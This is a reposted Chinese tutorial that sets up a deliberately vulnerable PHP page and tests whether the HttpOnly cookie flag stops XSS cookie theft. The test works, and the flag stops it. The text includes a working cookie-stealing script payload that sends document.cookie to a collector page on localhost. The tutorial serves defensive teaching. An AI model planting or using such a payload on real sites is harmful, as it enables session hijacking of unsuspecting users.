碼上快樂

相關內容    簡體    繁體

測試cookie是否設置httponly屬性防護XSS攻擊

本文轉載自   查看原文   2019-06-14 15:26   2297    httponly

測試內容:

本次測試環境,搭建一個包含XSS漏洞的php環境。

地址:

http://localhost/home.php

如圖所示:

存在xss漏洞,獲取cookie的代碼為:

<script>document.location = 'http://localhost/cookie_collect.php?cookie=' + document.cookie;</script>

 

獲取COOKIE的頁面為:http://localhost/cookie_collect.php

如圖所示:

 

測試01

未設置httponly屬性,cookie設置為:

<?php 

 setcookie("xsstest", "xsstest", time()+3600, "/", "", false, false);

?>

測試結果:

獲取到cookie的內容,如圖所示:

訪問日志內容為:

測試結果:利用跨站漏洞可以獲取cookie內容。

測試02

設置httponly屬性,cookie設置為:

<?php 

 setcookie("xsstest", "xsstest", time()+3600, "/", "", false, true);

?>

測試結果:

未獲取到cookie的內容,如圖所示:

訪問日志內容為:

測試結果:利用跨站漏洞不能夠獲取cookie內容。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 php設置cookie為httponly防止xss攻擊 Cookie中設置了 HttpOnly,Secure 屬性,有效的防止XSS攻擊,X-Frame-Options 響應頭避免點擊劫持 Spring Boot 利用Filter 實現防止XSS攻擊+設置Cookie HttpOnly cookie的secure、httponly屬性設置 PHP設置COOKIE的HttpOnly屬性 cookie可設置哪些屬性?httponly? cookie設置HttpOnly、Secure屬性 PHP設置COOKIE的HttpOnly屬性 (三)XSS 攻擊防護——X-XSS-Protection Xss之HttpOnly下的攻擊手法
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM